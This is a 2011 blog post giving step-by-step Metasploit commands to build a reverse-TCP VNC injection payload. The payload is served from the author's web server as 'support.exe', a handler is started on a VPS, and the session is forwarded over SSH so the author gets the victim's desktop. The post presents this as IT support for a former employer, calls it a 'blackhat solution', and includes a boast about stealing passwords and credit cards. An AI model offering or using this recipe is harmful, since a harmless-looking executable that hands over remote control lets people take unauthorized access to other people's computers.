Wednesday, July 27, 2011

Meterpreter VNC payload for IT support

So, the first place that ever got me a job was this small independent UPS store in chicago. They had no tech person whatsoever and nobody was really technically inclined. I got a job as a normal associate. I saw that they had multiple technical issues, and I recognized the fact that I could solve them. So I stepped up and starting taking care of all of their tech issues (Remember: I wasnt hired to do any of that). I became their IT administrator for their 4 stores. I handled everything they needed and some things i thought they should have.

Long story short, I moved onto multiple other jobs that were more tech focused. But they are now without a tech person. Incidentally, im still their tech person lol. They call me all the time to help with some printer or network connection or driver issue or some other IT support issue. I had set up logmein accounts for most of the machines when I worked for them. But this was a long time ago and they got wiped out several times. ENTER THE BLACKHAT SOLUTION.

I figure: hey, if I can get passwords and credit cards from multi-billion dollar corporations, getting a VNC session to some shitty POS behind a nat should be flippin' easy.

It is. Here's how:

Tech Support via Metasploit:
I'm assuming you already have MSF and apache installed and working properly on your machine. If you dont, google it, its easy to do.

1. generate the VNC payload with the proper settings to connect back:
msfpayload windows/vncinject/reverse_tcp X > /var/www/support.exe

2. start the multihandler on your VPS to listen for the VNC connection
use exploit/multi/handler
set PAYLOAD windows/vncinject/reverse_tcp

3. tell your person to go to and run the executable. The VNC payload should connect back to your VPS and you should get output similar to the following:

msf exploit(handler) > exploit

[*] Started reverse handler on
[*] Starting the payload handler...
[*] Sending stage (445440 bytes) to
[*] Starting local TCP relay on
[*] Local TCP relay started.
[-] Failed to launch vncviewer. Is it installed and in your path?
[*] Session 2 created in the background.

4. I do everything via command line so I have to forward the localhost only port to an internet accessible one by using SSH, this is how:
ssh -L :5901:localhost:5900 username@localhost

5. now run netstat -ntlp to make sure 5901 is listening on the public interface (

6. now use a VNC client to connect to your VPS on port 5901. (chickenoftheVNC, set the "display" to 1)

7. BAM you should have their desktop now.

If you have any questions, just ask.

No comments:

Post a Comment